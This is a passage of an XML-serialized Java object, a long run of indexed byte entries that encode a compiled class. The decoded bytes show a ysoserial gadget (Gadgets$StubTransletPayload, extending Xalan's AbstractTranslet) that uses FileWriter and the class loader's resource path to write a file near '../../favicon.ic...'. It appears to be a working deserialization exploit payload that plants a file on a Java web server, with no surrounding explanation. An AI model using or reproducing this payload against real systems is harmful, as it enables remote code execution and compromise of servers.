index=\"1174\"><byte>47</byte></void><void index=\"1175\"><byte>115</byte></void><void index=\"1176\"><byte>101</byte></void><void index=\"1177\"><byte>114</byte></void><void index=\"1178\"><byte>105</byte></void><void index=\"1179\"><byte>97</byte></void><void index=\"1180\"><byte>108</byte></void><void index=\"1181\"><byte>105</byte></void><void index=\"1182\"><byte>122</byte></void><void index=\"1183\"><byte>101</byte></void><void index=\"1184\"><byte>114</byte></void><void index=\"1185\"><byte>47</byte></void><void index=\"1186\"><byte>83</byte></void><void index=\"1187\"><byte>101</byte></void><void index=\"1188\"><byte>114</byte></void><void index=\"1189\"><byte>105</byte></void><void index=\"1190\"><byte>97</byte></void><void index=\"1191\"><byte>108</byte></void><void index=\"1192\"><byte>105</byte></void><void index=\"1193\"><byte>122</byte></void><void index=\"1194\"><byte>97</byte></void><void index=\"1195\"><byte>116</byte></void><void index=\"1196\"><byte>105</byte></void><void index=\"1197\"><byte>111</byte></void><void index=\"1198\"><byte>110</byte></void><void index=\"1199\"><byte>72</byte></void><void index=\"1200\"><byte>97</byte></void><void index=\"1201\"><byte>110</byte></void><void index=\"1202\"><byte>100</byte></void><void index=\"1203\"><byte>108</byte></void><void index=\"1204\"><byte>101</byte></void><void index=\"1205\"><byte>114</byte></void><void index=\"1206\"><byte>59</byte></void><void index=\"1207\"><byte>1</byte></void><void index=\"1208\"><byte>0</byte></void><void index=\"1209\"><byte>10</byte></void><void index=\"1210\"><byte>83</byte></void><void index=\"1211\"><byte>111</byte></void><void index=\"1212\"><byte>117</byte></void><void index=\"1213\"><byte>114</byte></void><void index=\"1214\"><byte>99</byte></void><void index=\"1215\"><byte>101</byte></void><void index=\"1216\"><byte>70</byte></void><void index=\"1217\"><byte>105</byte></void><void index=\"1218\"><byte>108</byte></void><void index=\"1219\"><byte>101</byte></void><void index=\"1220\"><byte>1</byte></void><void index=\"1221\"><byte>0</byte></void><void index=\"1222\"><byte>12</byte></void><void index=\"1223\"><byte>71</byte></void><void index=\"1224\"><byte>97</byte></void><void index=\"1225\"><byte>100</byte></void><void index=\"1226\"><byte>103</byte></void><void index=\"1227\"><byte>101</byte></void><void index=\"1228\"><byte>116</byte></void><void index=\"1229\"><byte>115</byte></void><void index=\"1230\"><byte>46</byte></void><void index=\"1231\"><byte>106</byte></void><void index=\"1232\"><byte>97</byte></void><void index=\"1233\"><byte>118</byte></void><void index=\"1234\"><byte>97</byte></void><void index=\"1235\"><byte>12</byte></void><void index=\"1236\"><byte>0</byte></void><void index=\"1237\"><byte>10</byte></void><void index=\"1238\"><byte>0</byte></void><void index=\"1239\"><byte>11</byte></void><void index=\"1240\"><byte>7</byte></void><void index=\"1241\"><byte>0</byte></void><void index=\"1242\"><byte>40</byte></void><void index=\"1243\"><byte>1</byte></void><void index=\"1244\"><byte>0</byte></void><void index=\"1245\"><byte>51</byte></void><void index=\"1246\"><byte>121</byte></void><void index=\"1247\"><byte>115</byte></void><void index=\"1248\"><byte>111</byte></void><void index=\"1249\"><byte>115</byte></void><void index=\"1250\"><byte>101</byte></void><void index=\"1251\"><byte>114</byte></void><void index=\"1252\"><byte>105</byte></void><void index=\"1253\"><byte>97</byte></void><void index=\"1254\"><byte>108</byte></void><void index=\"1255\"><byte>47</byte></void><void index=\"1256\"><byte>112</byte></void><void index=\"1257\"><byte>97</byte></void><void index=\"1258\"><byte>121</byte></void><void index=\"1259\"><byte>108</byte></void><void index=\"1260\"><byte>111</byte></void><void index=\"1261\"><byte>97</byte></void><void index=\"1262\"><byte>100</byte></void><void index=\"1263\"><byte>115</byte></void><void index=\"1264\"><byte>47</byte></void><void index=\"1265\"><byte>117</byte></void><void index=\"1266\"><byte>116</byte></void><void index=\"1267\"><byte>105</byte></void><void index=\"1268\"><byte>108</byte></void><void index=\"1269\"><byte>47</byte></void><void index=\"1270\"><byte>71</byte></void><void index=\"1271\"><byte>97</byte></void><void index=\"1272\"><byte>100</byte></void><void index=\"1273\"><byte>103</byte></void><void index=\"1274\"><byte>101</byte></void><void index=\"1275\"><byte>116</byte></void><void index=\"1276\"><byte>115</byte></void><void index=\"1277\"><byte>36</byte></void><void index=\"1278\"><byte>83</byte></void><void index=\"1279\"><byte>116</byte></void><void index=\"1280\"><byte>117</byte></void><void index=\"1281\"><byte>98</byte></void><void index=\"1282\"><byte>84</byte></void><void index=\"1283\"><byte>114</byte></void><void index=\"1284\"><byte>97</byte></void><void index=\"1285\"><byte>110</byte></void><void index=\"1286\"><byte>115</byte></void><void index=\"1287\"><byte>108</byte></void><void index=\"1288\"><byte>101</byte></void><void index=\"1289\"><byte>116</byte></void><void index=\"1290\"><byte>80</byte></void><void index=\"1291\"><byte>97</byte></void><void index=\"1292\"><byte>121</byte></void><void index=\"1293\"><byte>108</byte></void><void index=\"1294\"><byte>111</byte></void><void index=\"1295\"><byte>97</byte></void><void index=\"1296\"><byte>100</byte></void><void index=\"1297\"><byte>1</byte></void><void index=\"1298\"><byte>0</byte></void><void index=\"1299\"><byte>64</byte></void><void index=\"1300\"><byte>99</byte></void><void index=\"1301\"><byte>111</byte></void><void index=\"1302\"><byte>109</byte></void><void index=\"1303\"><byte>47</byte></void><void index=\"1304\"><byte>115</byte></void><void index=\"1305\"><byte>117</byte></void><void index=\"1306\"><byte>110</byte></void><void index=\"1307\"><byte>47</byte></void><void index=\"1308\"><byte>111</byte></void><void index=\"1309\"><byte>114</byte></void><void index=\"1310\"><byte>103</byte></void><void index=\"1311\"><byte>47</byte></void><void index=\"1312\"><byte>97</byte></void><void index=\"1313\"><byte>112</byte></void><void index=\"1314\"><byte>97</byte></void><void index=\"1315\"><byte>99</byte></void><void index=\"1316\"><byte>104</byte></void><void index=\"1317\"><byte>101</byte></void><void index=\"1318\"><byte>47</byte></void><void index=\"1319\"><byte>120</byte></void><void index=\"1320\"><byte>97</byte></void><void index=\"1321\"><byte>108</byte></void><void index=\"1322\"><byte>97</byte></void><void index=\"1323\"><byte>110</byte></void><void index=\"1324\"><byte>47</byte></void><void index=\"1325\"><byte>105</byte></void><void index=\"1326\"><byte>110</byte></void><void index=\"1327\"><byte>116</byte></void><void index=\"1328\"><byte>101</byte></void><void index=\"1329\"><byte>114</byte></void><void index=\"1330\"><byte>110</byte></void><void index=\"1331\"><byte>97</byte></void><void index=\"1332\"><byte>108</byte></void><void index=\"1333\"><byte>47</byte></void><void index=\"1334\"><byte>120</byte></void><void index=\"1335\"><byte>115</byte></void><void index=\"1336\"><byte>108</byte></void><void index=\"1337\"><byte>116</byte></void><void index=\"1338\"><byte>99</byte></void><void index=\"1339\"><byte>47</byte></void><void index=\"1340\"><byte>114</byte></void><void index=\"1341\"><byte>117</byte></void><void index=\"1342\"><byte>110</byte></void><void index=\"1343\"><byte>116</byte></void><void index=\"1344\"><byte>105</byte></void><void index=\"1345\"><byte>109</byte></void><void index=\"1346\"><byte>101</byte></void><void index=\"1347\"><byte>47</byte></void><void index=\"1348\"><byte>65</byte></void><void index=\"1349\"><byte>98</byte></void><void index=\"1350\"><byte>115</byte></void><void index=\"1351\"><byte>116</byte></void><void index=\"1352\"><byte>114</byte></void><void index=\"1353\"><byte>97</byte></void><void index=\"1354\"><byte>99</byte></void><void index=\"1355\"><byte>116</byte></void><void index=\"1356\"><byte>84</byte></void><void index=\"1357\"><byte>114</byte></void><void index=\"1358\"><byte>97</byte></void><void index=\"1359\"><byte>110</byte></void><void index=\"1360\"><byte>115</byte></void><void index=\"1361\"><byte>108</byte></void><void index=\"1362\"><byte>101</byte></void><void index=\"1363\"><byte>116</byte></void><void index=\"1364\"><byte>1</byte></void><void index=\"1365\"><byte>0</byte></void><void index=\"1366\"><byte>20</byte></void><void index=\"1367\"><byte>106</byte></void><void index=\"1368\"><byte>97</byte></void><void index=\"1369\"><byte>118</byte></void><void index=\"1370\"><byte>97</byte></void><void index=\"1371\"><byte>47</byte></void><void index=\"1372\"><byte>105</byte></void><void index=\"1373\"><byte>111</byte></void><void index=\"1374\"><byte>47</byte></void><void index=\"1375\"><byte>83</byte></void><void index=\"1376\"><byte>101</byte></void><void index=\"1377\"><byte>114</byte></void><void index=\"1378\"><byte>105</byte></void><void index=\"1379\"><byte>97</byte></void><void index=\"1380\"><byte>108</byte></void><void index=\"1381\"><byte>105</byte></void><void index=\"1382\"><byte>122</byte></void><void index=\"1383\"><byte>97</byte></void><void index=\"1384\"><byte>98</byte></void><void index=\"1385\"><byte>108</byte></void><void index=\"1386\"><byte>101</byte></void><void index=\"1387\"><byte>1</byte></void><void index=\"1388\"><byte>0</byte></void><void index=\"1389\"><byte>57</byte></void><void index=\"1390\"><byte>99</byte></void><void index=\"1391\"><byte>111</byte></void><void index=\"1392\"><byte>109</byte></void><void index=\"1393\"><byte>47</byte></void><void index=\"1394\"><byte>115</byte></void><void index=\"1395\"><byte>117</byte></void><void index=\"1396\"><byte>110</byte></void><void index=\"1397\"><byte>47</byte></void><void index=\"1398\"><byte>111</byte></void><void index=\"1399\"><byte>114</byte></void><void index=\"1400\"><byte>103</byte></void><void index=\"1401\"><byte>47</byte></void><void index=\"1402\"><byte>97</byte></void><void index=\"1403\"><byte>112</byte></void><void index=\"1404\"><byte>97</byte></void><void index=\"1405\"><byte>99</byte></void><void index=\"1406\"><byte>104</byte></void><void index=\"1407\"><byte>101</byte></void><void index=\"1408\"><byte>47</byte></void><void index=\"1409\"><byte>120</byte></void><void index=\"1410\"><byte>97</byte></void><void index=\"1411\"><byte>108</byte></void><void index=\"1412\"><byte>97</byte></void><void index=\"1413\"><byte>110</byte></void><void index=\"1414\"><byte>47</byte></void><void index=\"1415\"><byte>105</byte></void><void index=\"1416\"><byte>110</byte></void><void index=\"1417\"><byte>116</byte></void><void index=\"1418\"><byte>101</byte></void><void index=\"1419\"><byte>114</byte></void><void index=\"1420\"><byte>110</byte></void><void index=\"1421\"><byte>97</byte></void><void index=\"1422\"><byte>108</byte></void><void index=\"1423\"><byte>47</byte></void><void index=\"1424\"><byte>120</byte></void><void index=\"1425\"><byte>115</byte></void><void index=\"1426\"><byte>108</byte></void><void index=\"1427\"><byte>116</byte></void><void index=\"1428\"><byte>99</byte></void><void index=\"1429\"><byte>47</byte></void><void index=\"1430\"><byte>84</byte></void><void index=\"1431\"><byte>114</byte></void><void index=\"1432\"><byte>97</byte></void><void index=\"1433\"><byte>110</byte></void><void index=\"1434\"><byte>115</byte></void><void index=\"1435\"><byte>108</byte></void><void index=\"1436\"><byte>101</byte></void><void index=\"1437\"><byte>116</byte></void><void index=\"1438\"><byte>69</byte></void><void index=\"1439\"><byte>120</byte></void><void index=\"1440\"><byte>99</byte></void><void index=\"1441\"><byte>101</byte></void><void index=\"1442\"><byte>112</byte></void><void index=\"1443\"><byte>116</byte></void><void index=\"1444\"><byte>105</byte></void><void index=\"1445\"><byte>111</byte></void><void index=\"1446\"><byte>110</byte></void><void index=\"1447\"><byte>1</byte></void><void index=\"1448\"><byte>0</byte></void><void index=\"1449\"><byte>31</byte></void><void index=\"1450\"><byte>121</byte></void><void index=\"1451\"><byte>115</byte></void><void index=\"1452\"><byte>111</byte></void><void index=\"1453\"><byte>115</byte></void><void index=\"1454\"><byte>101</byte></void><void index=\"1455\"><byte>114</byte></void><void index=\"1456\"><byte>105</byte></void><void index=\"1457\"><byte>97</byte></void><void index=\"1458\"><byte>108</byte></void><void index=\"1459\"><byte>47</byte></void><void index=\"1460\"><byte>112</byte></void><void index=\"1461\"><byte>97</byte></void><void index=\"1462\"><byte>121</byte></void><void index=\"1463\"><byte>108</byte></void><void index=\"1464\"><byte>111</byte></void><void index=\"1465\"><byte>97</byte></void><void index=\"1466\"><byte>100</byte></void><void index=\"1467\"><byte>115</byte></void><void index=\"1468\"><byte>47</byte></void><void index=\"1469\"><byte>117</byte></void><void index=\"1470\"><byte>116</byte></void><void index=\"1471\"><byte>105</byte></void><void index=\"1472\"><byte>108</byte></void><void index=\"1473\"><byte>47</byte></void><void index=\"1474\"><byte>71</byte></void><void index=\"1475\"><byte>97</byte></void><void index=\"1476\"><byte>100</byte></void><void index=\"1477\"><byte>103</byte></void><void index=\"1478\"><byte>101</byte></void><void index=\"1479\"><byte>116</byte></void><void index=\"1480\"><byte>115</byte></void><void index=\"1481\"><byte>1</byte></void><void index=\"1482\"><byte>0</byte></void><void index=\"1483\"><byte>8</byte></void><void index=\"1484\"><byte>60</byte></void><void index=\"1485\"><byte>99</byte></void><void index=\"1486\"><byte>108</byte></void><void index=\"1487\"><byte>105</byte></void><void index=\"1488\"><byte>110</byte></void><void index=\"1489\"><byte>105</byte></void><void index=\"1490\"><byte>116</byte></void><void index=\"1491\"><byte>62</byte></void><void index=\"1492\"><byte>1</byte></void><void index=\"1493\"><byte>0</byte></void><void index=\"1494\"><byte>18</byte></void><void index=\"1495\"><byte>106</byte></void><void index=\"1496\"><byte>97</byte></void><void index=\"1497\"><byte>118</byte></void><void index=\"1498\"><byte>97</byte></void><void index=\"1499\"><byte>47</byte></void><void index=\"1500\"><byte>105</byte></void><void index=\"1501\"><byte>111</byte></void><void index=\"1502\"><byte>47</byte></void><void index=\"1503\"><byte>70</byte></void><void index=\"1504\"><byte>105</byte></void><void index=\"1505\"><byte>108</byte></void><void index=\"1506\"><byte>101</byte></void><void index=\"1507\"><byte>87</byte></void><void index=\"1508\"><byte>114</byte></void><void index=\"1509\"><byte>105</byte></void><void index=\"1510\"><byte>116</byte></void><void index=\"1511\"><byte>101</byte></void><void index=\"1512\"><byte>114</byte></void><void index=\"1513\"><byte>7</byte></void><void index=\"1514\"><byte>0</byte></void><void index=\"1515\"><byte>42</byte></void><void index=\"1516\"><byte>1</byte></void><void index=\"1517\"><byte>0</byte></void><void index=\"1518\"><byte>22</byte></void><void index=\"1519\"><byte>106</byte></void><void index=\"1520\"><byte>97</byte></void><void index=\"1521\"><byte>118</byte></void><void index=\"1522\"><byte>97</byte></void><void index=\"1523\"><byte>47</byte></void><void index=\"1524\"><byte>108</byte></void><void index=\"1525\"><byte>97</byte></void><void index=\"1526\"><byte>110</byte></void><void index=\"1527\"><byte>103</byte></void><void index=\"1528\"><byte>47</byte></void><void index=\"1529\"><byte>83</byte></void><void index=\"1530\"><byte>116</byte></void><void index=\"1531\"><byte>114</byte></void><void index=\"1532\"><byte>105</byte></void><void index=\"1533\"><byte>110</byte></void><void index=\"1534\"><byte>103</byte></void><void index=\"1535\"><byte>66</byte></void><void index=\"1536\"><byte>117</byte></void><void index=\"1537\"><byte>102</byte></void><void index=\"1538\"><byte>102</byte></void><void index=\"1539\"><byte>101</byte></void><void index=\"1540\"><byte>114</byte></void><void index=\"1541\"><byte>7</byte></void><void index=\"1542\"><byte>0</byte></void><void index=\"1543\"><byte>44</byte></void><void index=\"1544\"><byte>10</byte></void><void index=\"1545\"><byte>0</byte></void><void index=\"1546\"><byte>45</byte></void><void index=\"1547\"><byte>0</byte></void><void index=\"1548\"><byte>34</byte></void><void index=\"1549\"><byte>1</byte></void><void index=\"1550\"><byte>0</byte></void><void index=\"1551\"><byte>16</byte></void><void index=\"1552\"><byte>106</byte></void><void index=\"1553\"><byte>97</byte></void><void index=\"1554\"><byte>118</byte></void><void index=\"1555\"><byte>97</byte></void><void index=\"1556\"><byte>47</byte></void><void index=\"1557\"><byte>108</byte></void><void index=\"1558\"><byte>97</byte></void><void index=\"1559\"><byte>110</byte></void><void index=\"1560\"><byte>103</byte></void><void index=\"1561\"><byte>47</byte></void><void index=\"1562\"><byte>84</byte></void><void index=\"1563\"><byte>104</byte></void><void index=\"1564\"><byte>114</byte></void><void index=\"1565\"><byte>101</byte></void><void index=\"1566\"><byte>97</byte></void><void index=\"1567\"><byte>100</byte></void><void index=\"1568\"><byte>7</byte></void><void index=\"1569\"><byte>0</byte></void><void index=\"1570\"><byte>47</byte></void><void index=\"1571\"><byte>1</byte></void><void index=\"1572\"><byte>0</byte></void><void index=\"1573\"><byte>13</byte></void><void index=\"1574\"><byte>99</byte></void><void index=\"1575\"><byte>117</byte></void><void index=\"1576\"><byte>114</byte></void><void index=\"1577\"><byte>114</byte></void><void index=\"1578\"><byte>101</byte></void><void index=\"1579\"><byte>110</byte></void><void index=\"1580\"><byte>116</byte></void><void index=\"1581\"><byte>84</byte></void><void index=\"1582\"><byte>104</byte></void><void index=\"1583\"><byte>114</byte></void><void index=\"1584\"><byte>101</byte></void><void index=\"1585\"><byte>97</byte></void><void index=\"1586\"><byte>100</byte></void><void index=\"1587\"><byte>1</byte></void><void index=\"1588\"><byte>0</byte></void><void index=\"1589\"><byte>20</byte></void><void index=\"1590\"><byte>40</byte></void><void index=\"1591\"><byte>41</byte></void><void index=\"1592\"><byte>76</byte></void><void index=\"1593\"><byte>106</byte></void><void index=\"1594\"><byte>97</byte></void><void index=\"1595\"><byte>118</byte></void><void index=\"1596\"><byte>97</byte></void><void index=\"1597\"><byte>47</byte></void><void index=\"1598\"><byte>108</byte></void><void index=\"1599\"><byte>97</byte></void><void index=\"1600\"><byte>110</byte></void><void index=\"1601\"><byte>103</byte></void><void index=\"1602\"><byte>47</byte></void><void index=\"1603\"><byte>84</byte></void><void index=\"1604\"><byte>104</byte></void><void index=\"1605\"><byte>114</byte></void><void index=\"1606\"><byte>101</byte></void><void index=\"1607\"><byte>97</byte></void><void index=\"1608\"><byte>100</byte></void><void index=\"1609\"><byte>59</byte></void><void index=\"1610\"><byte>12</byte></void><void index=\"1611\"><byte>0</byte></void><void index=\"1612\"><byte>49</byte></void><void index=\"1613\"><byte>0</byte></void><void index=\"1614\"><byte>50</byte></void><void index=\"1615\"><byte>10</byte></void><void index=\"1616\"><byte>0</byte></void><void index=\"1617\"><byte>48</byte></void><void index=\"1618\"><byte>0</byte></void><void index=\"1619\"><byte>51</byte></void><void index=\"1620\"><byte>1</byte></void><void index=\"1621\"><byte>0</byte></void><void index=\"1622\"><byte>21</byte></void><void index=\"1623\"><byte>103</byte></void><void index=\"1624\"><byte>101</byte></void><void index=\"1625\"><byte>116</byte></void><void index=\"1626\"><byte>67</byte></void><void index=\"1627\"><byte>111</byte></void><void index=\"1628\"><byte>110</byte></void><void index=\"1629\"><byte>116</byte></void><void index=\"1630\"><byte>101</byte></void><void index=\"1631\"><byte>120</byte></void><void index=\"1632\"><byte>116</byte></void><void index=\"1633\"><byte>67</byte></void><void index=\"1634\"><byte>108</byte></void><void index=\"1635\"><byte>97</byte></void><void index=\"1636\"><byte>115</byte></void><void index=\"1637\"><byte>115</byte></void><void index=\"1638\"><byte>76</byte></void><void index=\"1639\"><byte>111</byte></void><void index=\"1640\"><byte>97</byte></void><void index=\"1641\"><byte>100</byte></void><void index=\"1642\"><byte>101</byte></void><void index=\"1643\"><byte>114</byte></void><void index=\"1644\"><byte>1</byte></void><void index=\"1645\"><byte>0</byte></void><void index=\"1646\"><byte>25</byte></void><void index=\"1647\"><byte>40</byte></void><void index=\"1648\"><byte>41</byte></void><void index=\"1649\"><byte>76</byte></void><void index=\"1650\"><byte>106</byte></void><void index=\"1651\"><byte>97</byte></void><void index=\"1652\"><byte>118</byte></void><void index=\"1653\"><byte>97</byte></void><void index=\"1654\"><byte>47</byte></void><void index=\"1655\"><byte>108</byte></void><void index=\"1656\"><byte>97</byte></void><void index=\"1657\"><byte>110</byte></void><void index=\"1658\"><byte>103</byte></void><void index=\"1659\"><byte>47</byte></void><void index=\"1660\"><byte>67</byte></void><void index=\"1661\"><byte>108</byte></void><void index=\"1662\"><byte>97</byte></void><void index=\"1663\"><byte>115</byte></void><void index=\"1664\"><byte>115</byte></void><void index=\"1665\"><byte>76</byte></void><void index=\"1666\"><byte>111</byte></void><void index=\"1667\"><byte>97</byte></void><void index=\"1668\"><byte>100</byte></void><void index=\"1669\"><byte>101</byte></void><void index=\"1670\"><byte>114</byte></void><void index=\"1671\"><byte>59</byte></void><void index=\"1672\"><byte>12</byte></void><void index=\"1673\"><byte>0</byte></void><void index=\"1674\"><byte>53</byte></void><void index=\"1675\"><byte>0</byte></void><void index=\"1676\"><byte>54</byte></void><void index=\"1677\"><byte>10</byte></void><void index=\"1678\"><byte>0</byte></void><void index=\"1679\"><byte>48</byte></void><void index=\"1680\"><byte>0</byte></void><void index=\"1681\"><byte>55</byte></void><void index=\"1682\"><byte>1</byte></void><void index=\"1683\"><byte>0</byte></void><void index=\"1684\"><byte>1</byte></void><void index=\"1685\"><byte>47</byte></void><void index=\"1686\"><byte>8</byte></void><void index=\"1687\"><byte>0</byte></void><void index=\"1688\"><byte>57</byte></void><void index=\"1689\"><byte>1</byte></void><void index=\"1690\"><byte>0</byte></void><void index=\"1691\"><byte>21</byte></void><void index=\"1692\"><byte>106</byte></void><void index=\"1693\"><byte>97</byte></void><void index=\"1694\"><byte>118</byte></void><void index=\"1695\"><byte>97</byte></void><void index=\"1696\"><byte>47</byte></void><void index=\"1697\"><byte>108</byte></void><void index=\"1698\"><byte>97</byte></void><void index=\"1699\"><byte>110</byte></void><void index=\"1700\"><byte>103</byte></void><void index=\"1701\"><byte>47</byte></void><void index=\"1702\"><byte>67</byte></void><void index=\"1703\"><byte>108</byte></void><void index=\"1704\"><byte>97</byte></void><void index=\"1705\"><byte>115</byte></void><void index=\"1706\"><byte>115</byte></void><void index=\"1707\"><byte>76</byte></void><void index=\"1708\"><byte>111</byte></void><void index=\"1709\"><byte>97</byte></void><void index=\"1710\"><byte>100</byte></void><void index=\"1711\"><byte>101</byte></void><void index=\"1712\"><byte>114</byte></void><void index=\"1713\"><byte>7</byte></void><void index=\"1714\"><byte>0</byte></void><void index=\"1715\"><byte>59</byte></void><void index=\"1716\"><byte>1</byte></void><void index=\"1717\"><byte>0</byte></void><void index=\"1718\"><byte>11</byte></void><void index=\"1719\"><byte>103</byte></void><void index=\"1720\"><byte>101</byte></void><void index=\"1721\"><byte>116</byte></void><void index=\"1722\"><byte>82</byte></void><void index=\"1723\"><byte>101</byte></void><void index=\"1724\"><byte>115</byte></void><void index=\"1725\"><byte>111</byte></void><void index=\"1726\"><byte>117</byte></void><void index=\"1727\"><byte>114</byte></void><void index=\"1728\"><byte>99</byte></void><void index=\"1729\"><byte>101</byte></void><void index=\"1730\"><byte>1</byte></void><void index=\"1731\"><byte>0</byte></void><void index=\"1732\"><byte>34</byte></void><void index=\"1733\"><byte>40</byte></void><void index=\"1734\"><byte>76</byte></void><void index=\"1735\"><byte>106</byte></void><void index=\"1736\"><byte>97</byte></void><void index=\"1737\"><byte>118</byte></void><void index=\"1738\"><byte>97</byte></void><void index=\"1739\"><byte>47</byte></void><void index=\"1740\"><byte>108</byte></void><void index=\"1741\"><byte>97</byte></void><void index=\"1742\"><byte>110</byte></void><void index=\"1743\"><byte>103</byte></void><void index=\"1744\"><byte>47</byte></void><void index=\"1745\"><byte>83</byte></void><void index=\"1746\"><byte>116</byte></void><void index=\"1747\"><byte>114</byte></void><void index=\"1748\"><byte>105</byte></void><void index=\"1749\"><byte>110</byte></void><void index=\"1750\"><byte>103</byte></void><void index=\"1751\"><byte>59</byte></void><void index=\"1752\"><byte>41</byte></void><void index=\"1753\"><byte>76</byte></void><void index=\"1754\"><byte>106</byte></void><void index=\"1755\"><byte>97</byte></void><void index=\"1756\"><byte>118</byte></void><void index=\"1757\"><byte>97</byte></void><void index=\"1758\"><byte>47</byte></void><void index=\"1759\"><byte>110</byte></void><void index=\"1760\"><byte>101</byte></void><void index=\"1761\"><byte>116</byte></void><void index=\"1762\"><byte>47</byte></void><void index=\"1763\"><byte>85</byte></void><void index=\"1764\"><byte>82</byte></void><void index=\"1765\"><byte>76</byte></void><void index=\"1766\"><byte>59</byte></void><void index=\"1767\"><byte>12</byte></void><void index=\"1768\"><byte>0</byte></void><void index=\"1769\"><byte>61</byte></void><void index=\"1770\"><byte>0</byte></void><void index=\"1771\"><byte>62</byte></void><void index=\"1772\"><byte>10</byte></void><void index=\"1773\"><byte>0</byte></void><void index=\"1774\"><byte>60</byte></void><void index=\"1775\"><byte>0</byte></void><void index=\"1776\"><byte>63</byte></void><void index=\"1777\"><byte>1</byte></void><void index=\"1778\"><byte>0</byte></void><void index=\"1779\"><byte>12</byte></void><void index=\"1780\"><byte>106</byte></void><void index=\"1781\"><byte>97</byte></void><void index=\"1782\"><byte>118</byte></void><void index=\"1783\"><byte>97</byte></void><void index=\"1784\"><byte>47</byte></void><void index=\"1785\"><byte>110</byte></void><void index=\"1786\"><byte>101</byte></void><void index=\"1787\"><byte>116</byte></void><void index=\"1788\"><byte>47</byte></void><void index=\"1789\"><byte>85</byte></void><void index=\"1790\"><byte>82</byte></void><void index=\"1791\"><byte>76</byte></void><void index=\"1792\"><byte>7</byte></void><void index=\"1793\"><byte>0</byte></void><void index=\"1794\"><byte>65</byte></void><void index=\"1795\"><byte>1</byte></void><void index=\"1796\"><byte>0</byte></void><void index=\"1797\"><byte>7</byte></void><void index=\"1798\"><byte>103</byte></void><void index=\"1799\"><byte>101</byte></void><void index=\"1800\"><byte>116</byte></void><void index=\"1801\"><byte>80</byte></void><void index=\"1802\"><byte>97</byte></void><void index=\"1803\"><byte>116</byte></void><void index=\"1804\"><byte>104</byte></void><void index=\"1805\"><byte>1</byte></void><void index=\"1806\"><byte>0</byte></void><void index=\"1807\"><byte>20</byte></void><void index=\"1808\"><byte>40</byte></void><void index=\"1809\"><byte>41</byte></void><void index=\"1810\"><byte>76</byte></void><void index=\"1811\"><byte>106</byte></void><void index=\"1812\"><byte>97</byte></void><void index=\"1813\"><byte>118</byte></void><void index=\"1814\"><byte>97</byte></void><void index=\"1815\"><byte>47</byte></void><void index=\"1816\"><byte>108</byte></void><void index=\"1817\"><byte>97</byte></void><void index=\"1818\"><byte>110</byte></void><void index=\"1819\"><byte>103</byte></void><void index=\"1820\"><byte>47</byte></void><void index=\"1821\"><byte>83</byte></void><void index=\"1822\"><byte>116</byte></void><void index=\"1823\"><byte>114</byte></void><void index=\"1824\"><byte>105</byte></void><void index=\"1825\"><byte>110</byte></void><void index=\"1826\"><byte>103</byte></void><void index=\"1827\"><byte>59</byte></void><void index=\"1828\"><byte>12</byte></void><void index=\"1829\"><byte>0</byte></void><void index=\"1830\"><byte>67</byte></void><void index=\"1831\"><byte>0</byte></void><void index=\"1832\"><byte>68</byte></void><void index=\"1833\"><byte>10</byte></void><void index=\"1834\"><byte>0</byte></void><void index=\"1835\"><byte>66</byte></void><void index=\"1836\"><byte>0</byte></void><void index=\"1837\"><byte>69</byte></void><void index=\"1838\"><byte>1</byte></void><void index=\"1839\"><byte>0</byte></void><void index=\"1840\"><byte>6</byte></void><void index=\"1841\"><byte>97</byte></void><void index=\"1842\"><byte>112</byte></void><void index=\"1843\"><byte>112</byte></void><void index=\"1844\"><byte>101</byte></void><void index=\"1845\"><byte>110</byte></void><void index=\"1846\"><byte>100</byte></void><void index=\"1847\"><byte>1</byte></void><void index=\"1848\"><byte>0</byte></void><void index=\"1849\"><byte>44</byte></void><void index=\"1850\"><byte>40</byte></void><void index=\"1851\"><byte>76</byte></void><void index=\"1852\"><byte>106</byte></void><void index=\"1853\"><byte>97</byte></void><void index=\"1854\"><byte>118</byte></void><void index=\"1855\"><byte>97</byte></void><void index=\"1856\"><byte>47</byte></void><void index=\"1857\"><byte>108</byte></void><void index=\"1858\"><byte>97</byte></void><void index=\"1859\"><byte>110</byte></void><void index=\"1860\"><byte>103</byte></void><void index=\"1861\"><byte>47</byte></void><void index=\"1862\"><byte>83</byte></void><void index=\"1863\"><byte>116</byte></void><void index=\"1864\"><byte>114</byte></void><void index=\"1865\"><byte>105</byte></void><void index=\"1866\"><byte>110</byte></void><void index=\"1867\"><byte>103</byte></void><void index=\"1868\"><byte>59</byte></void><void index=\"1869\"><byte>41</byte></void><void index=\"1870\"><byte>76</byte></void><void index=\"1871\"><byte>106</byte></void><void index=\"1872\"><byte>97</byte></void><void index=\"1873\"><byte>118</byte></void><void index=\"1874\"><byte>97</byte></void><void index=\"1875\"><byte>47</byte></void><void index=\"1876\"><byte>108</byte></void><void index=\"1877\"><byte>97</byte></void><void index=\"1878\"><byte>110</byte></void><void index=\"1879\"><byte>103</byte></void><void index=\"1880\"><byte>47</byte></void><void index=\"1881\"><byte>83</byte></void><void index=\"1882\"><byte>116</byte></void><void index=\"1883\"><byte>114</byte></void><void index=\"1884\"><byte>105</byte></void><void index=\"1885\"><byte>110</byte></void><void index=\"1886\"><byte>103</byte></void><void index=\"1887\"><byte>66</byte></void><void index=\"1888\"><byte>117</byte></void><void index=\"1889\"><byte>102</byte></void><void index=\"1890\"><byte>102</byte></void><void index=\"1891\"><byte>101</byte></void><void index=\"1892\"><byte>114</byte></void><void index=\"1893\"><byte>59</byte></void><void index=\"1894\"><byte>12</byte></void><void index=\"1895\"><byte>0</byte></void><void index=\"1896\"><byte>71</byte></void><void index=\"1897\"><byte>0</byte></void><void index=\"1898\"><byte>72</byte></void><void index=\"1899\"><byte>10</byte></void><void index=\"1900\"><byte>0</byte></void><void index=\"1901\"><byte>45</byte></void><void index=\"1902\"><byte>0</byte></void><void index=\"1903\"><byte>73</byte></void><void index=\"1904\"><byte>1</byte></void><void index=\"1905\"><byte>0</byte></void><void index=\"1906\"><byte>17</byte></void><void index=\"1907\"><byte>46</byte></void><void index=\"1908\"><byte>46</byte></void><void index=\"1909\"><byte>47</byte></void><void index=\"1910\"><byte>46</byte></void><void index=\"1911\"><byte>46</byte></void><void index=\"1912\"><byte>47</byte></void><void index=\"1913\"><byte>102</byte></void><void index=\"1914\"><byte>97</byte></void><void index=\"1915\"><byte>118</byte></void><void index=\"1916\"><byte>105</byte></void><void index=\"1917\"><byte>99</byte></void><void index=\"1918\"><byte>111</byte></void><void index=\"1919\"><byte>110</byte></void><void index=\"1920\"><byte>46</byte></void><void index=\"1921\"><byte>105</byte></void><void index=\"1922\"><byte>99</byte></void><void 